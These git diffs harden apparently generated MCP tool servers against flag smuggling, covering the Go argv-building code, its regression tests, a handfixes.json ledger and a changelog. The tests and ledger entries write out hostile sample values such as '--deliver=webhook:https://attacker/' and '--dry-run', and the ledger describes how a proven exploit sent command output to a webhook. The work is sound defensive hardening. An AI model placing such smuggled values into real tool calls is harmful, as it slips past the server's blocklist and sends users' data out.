--- a/skills/avanan/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/avanan/cli/internal/mcp/cobratree/shellout_test.go
@@ -89,7 +89,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"profile":  true,
 		"token":    true,
 	})
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -118,7 +118,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in, map[string]bool{"args": true})
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -174,7 +174,7 @@ func TestBlockedStructuredArgsOnlyDropsInheritedRootFlags(t *testing.T) {
 		"config":  "/tmp/evil.yaml",
 		"json":    "true",
 	}, blocked)
-	want := []string{"--json", "true", "--profile", "local-profile"}
+	want := []string{"--json=true", "--profile=local-profile"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP command-aware blocklist: got %v, want %v", got, want)
 	}
@@ -392,7 +392,7 @@ func TestCLIArgsFromMCPSkipsStructuredPositionals(t *testing.T) {
 		"id":       "123",
 		"format":   "json",
 	}, blocked)
-	want := []string{"--format", "json"}
+	want := []string{"--format=json"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP forwarded positionals as flags: got %v, want %v", got, want)
 	}
@@ -831,4 +831,113 @@ func toolResultText(result *mcplib.CallToolResult) string {
 		return ""
 	}
 	return text.Text
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled}, blockedRootFlags)
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args, blockedRootFlags) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
+}
+
+// TestShellOutJoinsValuesSoTheyCannotSmuggleRootFlags is the end-to-end
+// half of mcp-argv-value-joined: the argv the child process actually
+// receives. The exploited shape was a doctor tool call whose json value
+// carried a denylisted --deliver.
+func TestShellOutJoinsValuesSoTheyCannotSmuggleRootFlags(t *testing.T) {
+	bin := writeArgvHelper(t)
+	handler := shellOutToCLI(
+		func() (string, error) { return bin, nil },
+		[]string{"doctor"},
+		map[string]bool{"args": true, "deliver": true},
+		map[string]bool{"json": true},
+		nil,
+		true,
+		nil,
+	)
+
+	result, err := handler(context.Background(), mcplib.CallToolRequest{Params: mcplib.CallToolParams{
+		Arguments: map[string]any{"json": "--deliver=webhook:https://x/"},
+	}})
+	if err != nil {
+		t.Fatalf("handler returned transport error: %v", err)
+	}
+	if result.IsError {
+		t.Fatalf("handler returned tool error: %s", toolResultText(result))
+	}
+	got := decodeArgvResult(t, result)
+	want := []string{"doctor", "--json=--deliver=webhook:https://x/"}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("shellout argv = %#v, want %#v", got, want)
+	}
+	for _, tok := range got {
+		if strings.HasPrefix(tok, "--deliver") {
+			t.Fatalf("a tool-call value reached the child as its own --deliver argv element: %#v", got)
+		}
+	}
 }

--- a/skills/avanan/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/avanan/cli/internal/mcp/cobratree/shellout_test.go
@@ -892,15 +892,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args, blockedRootFlags) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args, blockedRootFlags)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/avanan/cli/internal/mcp/intents.go
+++ b/skills/avanan/cli/internal/mcp/intents.go
@@ -49,6 +49,9 @@ func handleCheckAnAllowlistRequestBeforeYouGrantIt(ctx context.Context, req mcpl
 	args = append(args, "exceptions")
 	args = append(args, "find")
 	var missingDomain bool
+	if err := rejectFlagLikeRecipeValue("domain", input["domain"]); err != nil {
+		return mcplib.NewToolResultError(err.Error()), nil
+	}
 	args, missingDomain = appendRecipePositional(args, input["domain"], true)
 	if missingDomain {
 		return mcplib.NewToolResultError("domain is required"), nil
@@ -87,10 +90,10 @@ func appendRecipeStringFlag(args []string, name string, value any, defaultValue 
 	if selected == "" {
 		return args, required
 	}
-	if useEquals {
-		return append(args, "--"+name+"="+selected), false
-	}
-	return append(args, "--"+name, selected), false
+	// Hand-wired (handfixes.json: mcp-recipe-argv-not-flag-like): always
+	// joined, so a value can never be parsed as a second flag; useEquals is
+	// kept only for the generated call sites.
+	return append(args, "--"+name+"="+selected), false
 }
 
 func appendRecipeBoolFlag(args []string, name string, value any, defaultValue bool) []string {
@@ -121,4 +124,17 @@ func recipeValueString(value any) string {
 		}
 		return fmt.Sprintf("%v", value)
 	}
+}
+
+// rejectFlagLikeRecipeValue is hand-wired (handfixes.json:
+// mcp-recipe-argv-not-flag-like). A recipe positional comes straight from the
+// tool call and lands in argv ahead of the recipe's own flags, so a value
+// beginning with "-" would be parsed by pflag as a flag - the same key-only
+// gap mcp-argv-value-joined closes for cliArgsFromMCP. Mirrors the rule in
+// cobratree.validatePositionalArgsForMCP.
+func rejectFlagLikeRecipeValue(name string, value any) error {
+	if s := recipeValueString(value); s != "-" && strings.HasPrefix(s, "-") {
+		return fmt.Errorf("flag-like value %q not allowed for %s; pass a plain value", s, name)
+	}
+	return nil
 }

--- a/skills/avanan/cli/internal/mcp/recipe_intents_test.go
+++ b/skills/avanan/cli/internal/mcp/recipe_intents_test.go
@@ -101,3 +101,32 @@ func recipeToolText(t *testing.T, result *mcplib.CallToolResult) string {
 	}
 	return text.Text
 }
+
+// TestRecipeIntentCheckAnAllowlistRequestBeforeYouGrantItRejectsFlagLikePositional guards the hand-fix
+// mcp-recipe-argv-not-flag-like: a positional value that begins with "-"
+// would land in argv ahead of the recipe's own flags and be parsed by pflag
+// as a flag, so it must be refused before the CLI runs.
+func TestRecipeIntentCheckAnAllowlistRequestBeforeYouGrantItRejectsFlagLikePositional(t *testing.T) {
+	oldPath, oldErr := recipeCLIPath, recipeCLIPathErr
+	t.Cleanup(func() {
+		recipeCLIPath, recipeCLIPathErr = oldPath, oldErr
+	})
+	recipeCLIPath = writeRecipeIntentRecorder(t)
+	recipeCLIPathErr = nil
+
+	for _, bad := range []string{"--deliver=webhook:https://x/", "--dry-run", "-x"} {
+		req := mcplib.CallToolRequest{Params: mcplib.CallToolParams{Arguments: map[string]any{
+			"domain": bad,
+		}}}
+		result, err := handleCheckAnAllowlistRequestBeforeYouGrantIt(context.Background(), req)
+		if err != nil {
+			t.Fatalf("handler returned transport error: %v", err)
+		}
+		if !result.IsError {
+			t.Fatalf("flag-like domain %q reached the CLI: %s", bad, recipeToolText(t, result))
+		}
+		if got := recipeToolText(t, result); !strings.Contains(got, "flag-like") {
+			t.Fatalf("unexpected error for flag-like domain %q: %s", bad, got)
+		}
+	}
+}

--- a/skills/avanan/cli/internal/mcp/recipe_intents_test.go
+++ b/skills/avanan/cli/internal/mcp/recipe_intents_test.go
@@ -130,3 +130,20 @@ func TestRecipeIntentCheckAnAllowlistRequestBeforeYouGrantItRejectsFlagLikePosit
 		}
 	}
 }
+
+// TestRejectFlagLikeRecipeValueEdges pins the normalized rule of the hand-fix
+// mcp-recipe-argv-not-flag-like: leading whitespace is trimmed before the
+// check, the bare "-" is allowed, and a negative number is refused like any
+// other leading dash.
+func TestRejectFlagLikeRecipeValueEdges(t *testing.T) {
+	for _, bad := range []any{" --deliver=webhook:https://x/", "\t--dry-run", "  -x", "-5", float64(-5), "--"} {
+		if err := rejectFlagLikeRecipeValue("v", bad); err == nil {
+			t.Fatalf("flag-like value %#v was accepted", bad)
+		}
+	}
+	for _, ok := range []any{"-", "plain", " plain-value ", "a=b", float64(5), nil, ""} {
+		if err := rejectFlagLikeRecipeValue("v", ok); err != nil {
+			t.Fatalf("plain value %#v was refused: %v", ok, err)
+		}
+	}
+}

--- a/skills/avanan/handfixes.json
+++ b/skills/avanan/handfixes.json
@@ -665,6 +665,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/avanan/handfixes.json
+++ b/skills/avanan/handfixes.json
@@ -716,7 +716,7 @@
   },
   {
    "id": "mcp-recipe-argv-not-flag-like",
-   "summary": "Recipe intent handlers (internal/mcp/intents.go) build argv for the companion CLI outside cliArgsFromMCP. appendRecipeStringFlag now always emits one --name=value element (the useEquals=false split branch is gone), and every appendRecipePositional call site first runs rejectFlagLikeRecipeValue, which refuses a positional value beginning with '-' (except the bare '-') before the CLI runs.",
+   "summary": "Recipe intent handlers (internal/mcp/intents.go) build argv for the companion CLI outside cliArgsFromMCP. appendRecipeStringFlag now always emits one --name=value element (the useEquals=false split branch is gone), and every appendRecipePositional call site first runs rejectFlagLikeRecipeValue, which refuses a positional value beginning with '-' (except the bare '-') before the CLI runs. (1 guarded call site(s); the ledger requires all of them.)",
    "why": "Found by Codex adversarial review of the fleet mcp-argv-value-joined backport (2026-09-09): the recipe path had the same key-only gap. A recipe positional is appended to argv AHEAD of the recipe's own flags, so {\"domain\": \"--deliver=webhook:https://attacker/\"} became `exceptions find --deliver=webhook:... --agent` and pflag parsed the value as the denylisted root flag (and {\"domain\": \"--dry-run\"} demonstrably changed execution). The split appendRecipeStringFlag branch was safe only because its one caller's flag is a string flag that consumes the next token; a future NoOptDefVal flag would reopen it. Upstream cli-printing-press be378adf (#4647) fixed cliArgsFromMCP but NOT this recipe path, so a reprint REINTRODUCES it while go build and go test stay green; this entry is what notices. Mirrors cobratree.validatePositionalArgsForMCP, which already applies this rule to the raw args field. Retire only when the press generator refuses flag-like recipe positionals itself.",
    "status": "active",
    "asserts": [
@@ -745,6 +745,18 @@
     {
      "file": "cli/internal/mcp/recipe_intents_test.go",
      "contains": "RejectsFlagLikePositional(",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "contains": "if s := recipeValueString(value); s != \"-\" && strings.HasPrefix(s, \"-\") {",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/recipe_intents_test.go",
+     "contains": "func TestRejectFlagLikeRecipeValueEdges(",
      "min_count": 1,
      "code_only": true
     }

--- a/skills/avanan/handfixes.json
+++ b/skills/avanan/handfixes.json
@@ -680,8 +680,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -691,7 +703,50 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
+    }
+   ]
+  },
+  {
+   "id": "mcp-recipe-argv-not-flag-like",
+   "summary": "Recipe intent handlers (internal/mcp/intents.go) build argv for the companion CLI outside cliArgsFromMCP. appendRecipeStringFlag now always emits one --name=value element (the useEquals=false split branch is gone), and every appendRecipePositional call site first runs rejectFlagLikeRecipeValue, which refuses a positional value beginning with '-' (except the bare '-') before the CLI runs.",
+   "why": "Found by Codex adversarial review of the fleet mcp-argv-value-joined backport (2026-09-09): the recipe path had the same key-only gap. A recipe positional is appended to argv AHEAD of the recipe's own flags, so {\"domain\": \"--deliver=webhook:https://attacker/\"} became `exceptions find --deliver=webhook:... --agent` and pflag parsed the value as the denylisted root flag (and {\"domain\": \"--dry-run\"} demonstrably changed execution). The split appendRecipeStringFlag branch was safe only because its one caller's flag is a string flag that consumes the next token; a future NoOptDefVal flag would reopen it. Upstream cli-printing-press be378adf (#4647) fixed cliArgsFromMCP but NOT this recipe path, so a reprint REINTRODUCES it while go build and go test stay green; this entry is what notices. Mirrors cobratree.validatePositionalArgsForMCP, which already applies this rule to the raw args field. Retire only when the press generator refuses flag-like recipe positionals itself.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "contains": "return append(args, \"--\"+name+\"=\"+selected), false",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "not_contains": "\"--\"+name, selected"
+    },
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "contains": "func rejectFlagLikeRecipeValue(",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "contains": "if err := rejectFlagLikeRecipeValue(",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/recipe_intents_test.go",
+     "contains": "RejectsFlagLikePositional(",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/aws-billing/CHANGELOG.md
+++ b/skills/aws-billing/CHANGELOG.md
@@ -11,9 +11,11 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
+  The `report --post-slack` hand-off to the Slack CLI joins its values the same way.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/aws-billing/CHANGELOG.md
+++ b/skills/aws-billing/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/aws-billing/CHANGELOG.md
+++ b/skills/aws-billing/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/aws-billing/cli/internal/cli/report.go
+++ b/skills/aws-billing/cli/internal/cli/report.go
@@ -329,7 +329,7 @@ func postReportToSlack(ctx context.Context, channel, summary, htmlDoc, stamp str
 		return fmt.Errorf("slack-pp-cli not found on PATH or in ~/.local/bin (install it to post to Slack)")
 	}
 	// 1. Summary message.
-	msg := exec.CommandContext(ctx, slack, "messages", "post_message", "--channel", channel, "--text", summary)
+	msg := exec.CommandContext(ctx, slack, slackMessageArgs(channel, summary)...)
 	if out, err := msg.CombinedOutput(); err != nil {
 		return fmt.Errorf("post_message: %v: %s", err, strings.TrimSpace(string(out)))
 	}
@@ -360,4 +360,12 @@ func findSlackCLI() string {
 		return cand
 	}
 	return ""
+}
+
+// slackMessageArgs is hand-wired (handfixes.json: slack-delegation-argv-joined):
+// channel is MCP-settable via --slack-channel, and slack-pp-cli's flag
+// parser is outside this repository, so each value is joined to its flag as
+// ONE argv element and can never be read as a second flag.
+func slackMessageArgs(channel, summary string) []string {
+	return []string{"messages", "post_message", "--channel=" + channel, "--text=" + summary}
 }

--- a/skills/aws-billing/cli/internal/cli/report_slack_args_test.go
+++ b/skills/aws-billing/cli/internal/cli/report_slack_args_test.go
@@ -1,0 +1,25 @@
+// Copyright 2026 Servosity Inc. and msp-skills contributors. Licensed under Apache-2.0. See LICENSE.
+
+package cli
+
+import (
+	"reflect"
+	"strings"
+	"testing"
+)
+
+// TestSlackMessageArgsJoinValues guards the hand-fix slack-delegation-argv-joined:
+// the Slack channel comes from an MCP-settable flag, so a value beginning with
+// "--" must stay contained inside its own --channel= element.
+func TestSlackMessageArgsJoinValues(t *testing.T) {
+	got := slackMessageArgs("--token=x", "hello --deliver=y")
+	want := []string{"messages", "post_message", "--channel=--token=x", "--text=hello --deliver=y"}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("slackMessageArgs = %#v, want %#v", got, want)
+	}
+	for _, tok := range got[2:] {
+		if !strings.Contains(tok, "=") {
+			t.Fatalf("value emitted as its own argv element: %q", tok)
+		}
+	}
+}

--- a/skills/aws-billing/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/aws-billing/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/aws-billing/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/aws-billing/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/aws-billing/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/aws-billing/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -61,7 +62,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -90,7 +91,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -222,4 +223,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
